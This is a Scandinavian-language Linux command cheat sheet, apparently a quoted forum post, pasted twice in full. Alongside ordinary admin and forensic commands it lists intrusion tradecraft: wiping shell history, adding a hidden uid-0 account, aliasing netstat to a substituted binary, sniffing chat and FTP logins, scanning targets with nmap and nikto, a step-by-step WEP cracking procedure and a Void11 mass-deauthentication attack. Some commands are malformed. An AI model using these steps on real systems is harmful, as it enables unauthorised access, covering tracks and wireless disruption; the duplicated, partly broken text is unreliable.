QUOTE
pwd
(visar vilken mapp man befinner sig i)
slocate
(som locate fasst dom flesta distar har den här bättre versionen)
man man
(visa manualen för 'man')
cd (utan parameter)
(gå till mappen specifierade i $HOME, oftast /home/[username])
echo "export HISTFILE=/dev/null >> .bash_profile.
(linke history filen til søppelkassen)
'unset HISTFILE; unset SAVEHIST'
(slå av history funksjonen på shellet)
HISTFILESIZE=0
(ikke logge det root gjør)
useradd -u 0 -o dseosl
(add user med uid0.)
ps auxww | more
(liste prosesser.)
find / -iname local.tgz
(finne fil.)
ls -la /tmp
(liste innhold i spesifisert mappe.)
rpm -qf /usr/bin/strings
(sjekker hvor pakken befinner seg)
rpm -V
(verifiser rpm pakker.)
gcc -static –o hello hello.c
(kompilere statisk linket)
gcc -o hello hello.c
(kompilere dynamisk linket - standard)
which ps
(viser hvor programmet befinner seg f.eks /bin/ps)
locate ps
(nesten samme som which)
ifconfig eth0 up/down
(bring interface eth0 opp/ned)
ifconfig wlan0 up
(bring interface wlan0 opp)
ifup -a
(start alle interface)
ifup eth0
(start interface eth0)
ifdown eth0
(stop interface eth0)
iwconfig
(info om trådløst config)
iwpriv
iwspy
top
ls -alh
(ls -la i human readable format)
netstat -lntu
(lister aktive tilkobliner - listening)
netstat -antu
(lister aktive tilkobliner - listening og established)
./lsof -i -n | more
(viser resultatet fra lsof - åpne sockets og programmer)
find / -iname ‘*.c’ -exec grep haxor {}\;
(søker i kildekode på filsystemet etter teksten haxor)
grep -a -B20 -A20 /dev/hda1 > string_search.txt
(sjekker strings i partisjonen og printer til fil)
strings -a lsof | more
(liste alle strings fra en fil)
strings xntps | head
(liste strings fra fil headeren)
cd /proc/<pid>.
(gå til prosess id mappen)
cd mappe*
(gå til mappen som starter med navn)
alias netstat='/home/.progs/netstat'
(sette netstat til å starte fra vår lokasjon)
unalias ls
(fjerne regelen for ls)
dsniff -c -s 65535
(-c er full tcp reassembly og -s er les full pakke - defult er 1024 bytes)
dsniff -n -r <filnavn>
(leser logg fra BerkelyDB format og ikke dns resolve)
tcpdump -n -r <filnavn>
(leser logg og ikke dns resolve.)
nohup msgsnarf -i eth0 -vv > /mnt/data/file.log &
(kjører msgsnarf i bckgr og logger chat meldinger)
tcpdump -n -s 0 -w file.log host 192.168.1.110 and not port 22
(kjører tcpdump og logger host utenom angitt port)
nohup tcpdump -n -s 0 -i eth0 file.log host 192.168.1.110 and not port 22 &
(kjører tcpdump i bakgrunnen på eth0 og logger til fil, dumper fullstendig datapakke)
nohup tcpdump -n -i eth0 -s 0 -w file.log port 6667 &
(kjører tcpdump i bckgr og logger kun port 6667)
nohup tcpdump -n -i eth0 -s 0 -w file.log src host 192.168.1.110 and dst port 80 &
(kjører tcpdump i bckgr og logger kun trafikk fra 110 til port 80)
tcpdump -n -A -r file.log port 6667 | more
(leser all trafikk til port 6667 fra file.log og lister det)
tcpdump -A -n -r file.log | egrep -e 'PRIVMSG' | awk -F ' ' '{print $2,$3}' | more
(dumper privmsgs fra file.log)
tcpdump -n -r tcpdump.log -w new.log port 53
(leser log filen og filtrerer port 53 data til ny fil)
tcpdump -vvv
(printer detaljert pakkeinformasjon utover vanlig)
tcpdump -xx
(printer pakken med link laget i hex)
tcpdump -XX
(printer pakken med link laget i hex og ascii)
tcptrace -n ftp_tcpdump.log > ftp_session.txt
(rekonstruerer en ftp login sesjon fra tcpdump fil)
tcpflow -v -r ftp_tcpdump.log
(lager sesjonsfiler direkte?)
ps auxww | grep tcpdump
(liste prosesser som inneholder tcpdump - sjekke at tcpdump kjører)
more environ
(liste environment variabler)
/usr/src/linux/include/asm-i386/unistd.h
arch/i386/kernel/entry.S
include/linux/sys.h
liste over api kall for kjernen - sammenlign adressene med:
/boot/System.map
/proc/ksyms
/proc/kcore
kstat -s
(lister kjente syscall og sjekker om de stemmer)
gdb /boot/vmlinux-2.4.20-8
(bruk av gdb for å se på api kall adresser for kjernen)
strace -f -p <pid>
(se api kall ett program mottar og sender med child prosesser.)
strace -ff -o filename -p <pid>
(se api kall ett program mottar og sender og print til fil.)
strace -o file.log ./program
(kjører programmet og lagrer alle api kall til file.log.)
strace -x -p <pid>
(printer binær data i hex format.)
strace -e trace=network -p <pid>
(printer alle utførte nettverks relaterte system kall fra kjørende prosess)
strace -v -p <pid>
(verbose mode - printer detaljer fra kjørende prosess.
/usr/include/hosts.h (ip adresser)
/usr/include/proc.h (prosesser)
/usr/include/log.h (tilkoblinger logging)
/usr/include/file.h (filer og biblioteker - /bin/ls leser fra her)
/usr/include/asm/unistd.h (kjerne api call)
kill <pid>
(kill prosess basert på pid fra ps -aux)
killall <processname>
(kill prosess basert på navn fra ps -aux) (-i med konfirmasjon)
init 0
(exit og slå av pcen)
tar czvf/cvvf config.tgz /lib/security/.config/
(lager tar arkiv av path)
tar xzvf/xvvf config.tgz /lib/security/.config/
(pakker ut arkiv til path)
egrep -e '/6667|/69' filename.log | more
(søke etter port 6667 og 69 i filen)
egrep -e '/69 ' filename.log | more
(søke etter port 69 og mellomrom i filen)
egrep -v '/6667' filename.log | more
(søke etter alt utenom port 6667 i filen)
diff ./original/setup ./honeypot/setup
(sammenligne filen for endringer)
md5sum <file>
(lage md5 sjekksum)
md5sum -b /dev/hda1 > part.log
(lage md5 sjekksum av partisjonen og lagre i part.log)
md5sum -c part.log
(sjekke md5 sjekksum fra partisjonen i part.log)
md5sum * > log.txt
(lage md5 sjekksum av alle filene i mappen og lagre i log.txt)
md5sum -c log.txt
(sjekke md5 sjekksum fra filene i log.txt)
file <file>
(show filetype)
hexdump -C <file>
(hex editor)
hexedit <file>
(bedre enn hexdump for å søke)
od -x <filename>
(annen hexdump)
rmmod
(Fjerner moduler i kjernen)
modprobe
(ladda en modul till kärnan)
insmod
(Legger til moduler i kjernen)
lsmod
(Lister moduler i kjernen)
modinfo
(Informasjon om moduler)
ln
(skapa länkar -s för mjuka)
dd
df
(viser diskplass)
du
(få storleken på alla filer i en mapp)
dd if=/dev/zero of=dev/hdb
(sletter all info og ikke bare linken)
mount –o loop,ro img.dd /mnt/test
(mount image read only)
lastcomm / lastlog / last / w / who
(viser info fra logger og hvem som er logget inn)
ls -alRu / (Access time)
ls -alRc / (File status change time)
ls -alR (File modification time)
date (System dato og klokke)
/etc/rc.d/rc.local (oppstartsskript?)
/etc/rc.d/init.d (oppstartsskript)
/root/.bash_history (bash history lagres her)
find / -user root -perm 4000 -print
(finner setuid root filer)
find / -grp kmem -perm 2000 -print
(finner setgid kmem filer)
find / \ ( -perm -4000 -o -perm -2000 \ ) -print
find / -type f \( -perm -04000 -o -perm -02000 \)
(finner alle setuid og setgid filer)
find / -perm -2 -print
(finner alle skrivbare filer)
find / -nouser -o -nogroup -print
(finner filer uten eier)
find /home -name .rhosts -print
(finner alle .rhosts filer)
/etc/hosts.allow
(ALL: 127 tillater tilkoblinger fra 127.*.*.*)
/etc/hosts.deny
(ALL: ALL stopper tilkoblinger utenfra)
chmod 755 *
(gi alle filer i mappen rettigheter 755)
.file
(skjult fil - vises kun med ls -la)
openssl s_client -quiet -connect targetIP:443
(leser header info fra host)
nikto -h target -o report.html -Format HTML
(scanne target med nikto og logge i html format)
./nikto.pl -ssl -h <ip> -port 443
(scanne SSL host for sårbarheter)
task/foremost/testdisk/autopsy
(recover deleted files from unix)
nmap -v -P0 -sS -O -sV <IP opsjon>
(-v = verbose -P0 = do not ping -sS = syn scan -O = OS Guess -V = version info)
IP opsjon: 192.168.*.* / 192.168.0-255.0-255 / 192.168.1-50,51-255.1,2,3,4,5-255 / 192.168.0.0/16
Wep cracking 128-Bit (injection)
********************************
1. ifconfig eth0 up
2. iwconfig eth0 mode monitor
*mount usb pen for å lagre pcap fil*
3. airodump eth0 tocrack
(sniff pakker - se etter WEP target)
4. aireplay -i eth0
(Infisere pakker)
BSSID er Ruterens MAC adresse sjekk om den stemmer med airodump
Ikke velg noen pakker med Dst Mac = FF:FF:FF:FF:FF
Sjekk i airodump at IVs øker sammen med ant. pakker,
hvis ikke prøv en annen pakke. Vent til du har fått 500 000 IVs sent.
*gå til usb pen dir eller hvor tocrack er lagret*
5. aircrack -q 3 -f 2 tocrack.cap
Void11 attack (mass-de-authenticate)
********************************
switch-to-hostap
*remove card and re-insert*
iwpriv wlan0 hostapd1
iwconfig wlan0 mode master
void11_hopper > /dev/null &
void11_penetration -D wlan0
BASH:
[ctrl + c] - avsluta pågående jobb.
[ctrl + z] - pausa pågående jobb.
fg 1 - återuppta jobb no 1, i förgrunden
bg 1 - återuppta jobb no 1, i bakgrunden
%1 - kör 'fg 1'
System mapper:
/bin : Used to hold executable files, found all over the file system.
/sbin: Used to hold the supervisors (root) executable files.
/boot: Bootup files like the kernal are stored here
/dev : This folder holds the device driver files here.
They are used to represent physical items eg. /dev/tty1 = communication port 1
/etc : Used to store most of the configuration files for linux.
/home: Stores all the user home directories here
/lib : Stores the liberies/runtimes for programs
/mnt : Unlike in windows where c:\ represents a drive, in linux,
the different drives are stored in /mnt and act like a directory.
/proc: Holds most of the processes happening in the linux system.
/root: The supervisors (root) home directory files.
/usr : stores user based files
/var : holds constantly changing files like print spools
/tmp : Temporary file folder
(visar vilken mapp man befinner sig i)
slocate
(som locate fasst dom flesta distar har den här bättre versionen)
man man
(visa manualen för 'man')
cd (utan parameter)
(gå till mappen specifierade i $HOME, oftast /home/[username])
echo "export HISTFILE=/dev/null >> .bash_profile.
(linke history filen til søppelkassen)
'unset HISTFILE; unset SAVEHIST'
(slå av history funksjonen på shellet)
HISTFILESIZE=0
(ikke logge det root gjør)
useradd -u 0 -o dseosl
(add user med uid0.)
ps auxww | more
(liste prosesser.)
find / -iname local.tgz
(finne fil.)
ls -la /tmp
(liste innhold i spesifisert mappe.)
rpm -qf /usr/bin/strings
(sjekker hvor pakken befinner seg)
rpm -V
(verifiser rpm pakker.)
gcc -static –o hello hello.c
(kompilere statisk linket)
gcc -o hello hello.c
(kompilere dynamisk linket - standard)
which ps
(viser hvor programmet befinner seg f.eks /bin/ps)
locate ps
(nesten samme som which)
ifconfig eth0 up/down
(bring interface eth0 opp/ned)
ifconfig wlan0 up
(bring interface wlan0 opp)
ifup -a
(start alle interface)
ifup eth0
(start interface eth0)
ifdown eth0
(stop interface eth0)
iwconfig
(info om trådløst config)
iwpriv
iwspy
top
ls -alh
(ls -la i human readable format)
netstat -lntu
(lister aktive tilkobliner - listening)
netstat -antu
(lister aktive tilkobliner - listening og established)
./lsof -i -n | more
(viser resultatet fra lsof - åpne sockets og programmer)
find / -iname ‘*.c’ -exec grep haxor {}\;
(søker i kildekode på filsystemet etter teksten haxor)
grep -a -B20 -A20 /dev/hda1 > string_search.txt
(sjekker strings i partisjonen og printer til fil)
strings -a lsof | more
(liste alle strings fra en fil)
strings xntps | head
(liste strings fra fil headeren)
cd /proc/<pid>.
(gå til prosess id mappen)
cd mappe*
(gå til mappen som starter med navn)
alias netstat='/home/.progs/netstat'
(sette netstat til å starte fra vår lokasjon)
unalias ls
(fjerne regelen for ls)
dsniff -c -s 65535
(-c er full tcp reassembly og -s er les full pakke - defult er 1024 bytes)
dsniff -n -r <filnavn>
(leser logg fra BerkelyDB format og ikke dns resolve)
tcpdump -n -r <filnavn>
(leser logg og ikke dns resolve.)
nohup msgsnarf -i eth0 -vv > /mnt/data/file.log &
(kjører msgsnarf i bckgr og logger chat meldinger)
tcpdump -n -s 0 -w file.log host 192.168.1.110 and not port 22
(kjører tcpdump og logger host utenom angitt port)
nohup tcpdump -n -s 0 -i eth0 file.log host 192.168.1.110 and not port 22 &
(kjører tcpdump i bakgrunnen på eth0 og logger til fil, dumper fullstendig datapakke)
nohup tcpdump -n -i eth0 -s 0 -w file.log port 6667 &
(kjører tcpdump i bckgr og logger kun port 6667)
nohup tcpdump -n -i eth0 -s 0 -w file.log src host 192.168.1.110 and dst port 80 &
(kjører tcpdump i bckgr og logger kun trafikk fra 110 til port 80)
tcpdump -n -A -r file.log port 6667 | more
(leser all trafikk til port 6667 fra file.log og lister det)
tcpdump -A -n -r file.log | egrep -e 'PRIVMSG' | awk -F ' ' '{print $2,$3}' | more
(dumper privmsgs fra file.log)
tcpdump -n -r tcpdump.log -w new.log port 53
(leser log filen og filtrerer port 53 data til ny fil)
tcpdump -vvv
(printer detaljert pakkeinformasjon utover vanlig)
tcpdump -xx
(printer pakken med link laget i hex)
tcpdump -XX
(printer pakken med link laget i hex og ascii)
tcptrace -n ftp_tcpdump.log > ftp_session.txt
(rekonstruerer en ftp login sesjon fra tcpdump fil)
tcpflow -v -r ftp_tcpdump.log
(lager sesjonsfiler direkte?)
ps auxww | grep tcpdump
(liste prosesser som inneholder tcpdump - sjekke at tcpdump kjører)
more environ
(liste environment variabler)
/usr/src/linux/include/asm-i386/unistd.h
arch/i386/kernel/entry.S
include/linux/sys.h
liste over api kall for kjernen - sammenlign adressene med:
/boot/System.map
/proc/ksyms
/proc/kcore
kstat -s
(lister kjente syscall og sjekker om de stemmer)
gdb /boot/vmlinux-2.4.20-8
(bruk av gdb for å se på api kall adresser for kjernen)
strace -f -p <pid>
(se api kall ett program mottar og sender med child prosesser.)
strace -ff -o filename -p <pid>
(se api kall ett program mottar og sender og print til fil.)
strace -o file.log ./program
(kjører programmet og lagrer alle api kall til file.log.)
strace -x -p <pid>
(printer binær data i hex format.)
strace -e trace=network -p <pid>
(printer alle utførte nettverks relaterte system kall fra kjørende prosess)
strace -v -p <pid>
(verbose mode - printer detaljer fra kjørende prosess.
/usr/include/hosts.h (ip adresser)
/usr/include/proc.h (prosesser)
/usr/include/log.h (tilkoblinger logging)
/usr/include/file.h (filer og biblioteker - /bin/ls leser fra her)
/usr/include/asm/unistd.h (kjerne api call)
kill <pid>
(kill prosess basert på pid fra ps -aux)
killall <processname>
(kill prosess basert på navn fra ps -aux) (-i med konfirmasjon)
init 0
(exit og slå av pcen)
tar czvf/cvvf config.tgz /lib/security/.config/
(lager tar arkiv av path)
tar xzvf/xvvf config.tgz /lib/security/.config/
(pakker ut arkiv til path)
egrep -e '/6667|/69' filename.log | more
(søke etter port 6667 og 69 i filen)
egrep -e '/69 ' filename.log | more
(søke etter port 69 og mellomrom i filen)
egrep -v '/6667' filename.log | more
(søke etter alt utenom port 6667 i filen)
diff ./original/setup ./honeypot/setup
(sammenligne filen for endringer)
md5sum <file>
(lage md5 sjekksum)
md5sum -b /dev/hda1 > part.log
(lage md5 sjekksum av partisjonen og lagre i part.log)
md5sum -c part.log
(sjekke md5 sjekksum fra partisjonen i part.log)
md5sum * > log.txt
(lage md5 sjekksum av alle filene i mappen og lagre i log.txt)
md5sum -c log.txt
(sjekke md5 sjekksum fra filene i log.txt)
file <file>
(show filetype)
hexdump -C <file>
(hex editor)
hexedit <file>
(bedre enn hexdump for å søke)
od -x <filename>
(annen hexdump)
rmmod
(Fjerner moduler i kjernen)
modprobe
(ladda en modul till kärnan)
insmod
(Legger til moduler i kjernen)
lsmod
(Lister moduler i kjernen)
modinfo
(Informasjon om moduler)
ln
(skapa länkar -s för mjuka)
dd
df
(viser diskplass)
du
(få storleken på alla filer i en mapp)
dd if=/dev/zero of=dev/hdb
(sletter all info og ikke bare linken)
mount –o loop,ro img.dd /mnt/test
(mount image read only)
lastcomm / lastlog / last / w / who
(viser info fra logger og hvem som er logget inn)
ls -alRu / (Access time)
ls -alRc / (File status change time)
ls -alR (File modification time)
date (System dato og klokke)
/etc/rc.d/rc.local (oppstartsskript?)
/etc/rc.d/init.d (oppstartsskript)
/root/.bash_history (bash history lagres her)
find / -user root -perm 4000 -print
(finner setuid root filer)
find / -grp kmem -perm 2000 -print
(finner setgid kmem filer)
find / \ ( -perm -4000 -o -perm -2000 \ ) -print
find / -type f \( -perm -04000 -o -perm -02000 \)
(finner alle setuid og setgid filer)
find / -perm -2 -print
(finner alle skrivbare filer)
find / -nouser -o -nogroup -print
(finner filer uten eier)
find /home -name .rhosts -print
(finner alle .rhosts filer)
/etc/hosts.allow
(ALL: 127 tillater tilkoblinger fra 127.*.*.*)
/etc/hosts.deny
(ALL: ALL stopper tilkoblinger utenfra)
chmod 755 *
(gi alle filer i mappen rettigheter 755)
.file
(skjult fil - vises kun med ls -la)
openssl s_client -quiet -connect targetIP:443
(leser header info fra host)
nikto -h target -o report.html -Format HTML
(scanne target med nikto og logge i html format)
./nikto.pl -ssl -h <ip> -port 443
(scanne SSL host for sårbarheter)
task/foremost/testdisk/autopsy
(recover deleted files from unix)
nmap -v -P0 -sS -O -sV <IP opsjon>
(-v = verbose -P0 = do not ping -sS = syn scan -O = OS Guess -V = version info)
IP opsjon: 192.168.*.* / 192.168.0-255.0-255 / 192.168.1-50,51-255.1,2,3,4,5-255 / 192.168.0.0/16
Wep cracking 128-Bit (injection)
********************************
1. ifconfig eth0 up
2. iwconfig eth0 mode monitor
*mount usb pen for å lagre pcap fil*
3. airodump eth0 tocrack
(sniff pakker - se etter WEP target)
4. aireplay -i eth0
(Infisere pakker)
BSSID er Ruterens MAC adresse sjekk om den stemmer med airodump
Ikke velg noen pakker med Dst Mac = FF:FF:FF:FF:FF
Sjekk i airodump at IVs øker sammen med ant. pakker,
hvis ikke prøv en annen pakke. Vent til du har fått 500 000 IVs sent.
*gå til usb pen dir eller hvor tocrack er lagret*
5. aircrack -q 3 -f 2 tocrack.cap
Void11 attack (mass-de-authenticate)
********************************
switch-to-hostap
*remove card and re-insert*
iwpriv wlan0 hostapd1
iwconfig wlan0 mode master
void11_hopper > /dev/null &
void11_penetration -D wlan0
BASH:
[ctrl + c] - avsluta pågående jobb.
[ctrl + z] - pausa pågående jobb.
fg 1 - återuppta jobb no 1, i förgrunden
bg 1 - återuppta jobb no 1, i bakgrunden
%1 - kör 'fg 1'
System mapper:
/bin : Used to hold executable files, found all over the file system.
/sbin: Used to hold the supervisors (root) executable files.
/boot: Bootup files like the kernal are stored here
/dev : This folder holds the device driver files here.
They are used to represent physical items eg. /dev/tty1 = communication port 1
/etc : Used to store most of the configuration files for linux.
/home: Stores all the user home directories here
/lib : Stores the liberies/runtimes for programs
/mnt : Unlike in windows where c:\ represents a drive, in linux,
the different drives are stored in /mnt and act like a directory.
/proc: Holds most of the processes happening in the linux system.
/root: The supervisors (root) home directory files.
/usr : stores user based files
/var : holds constantly changing files like print spools
/tmp : Temporary file folder
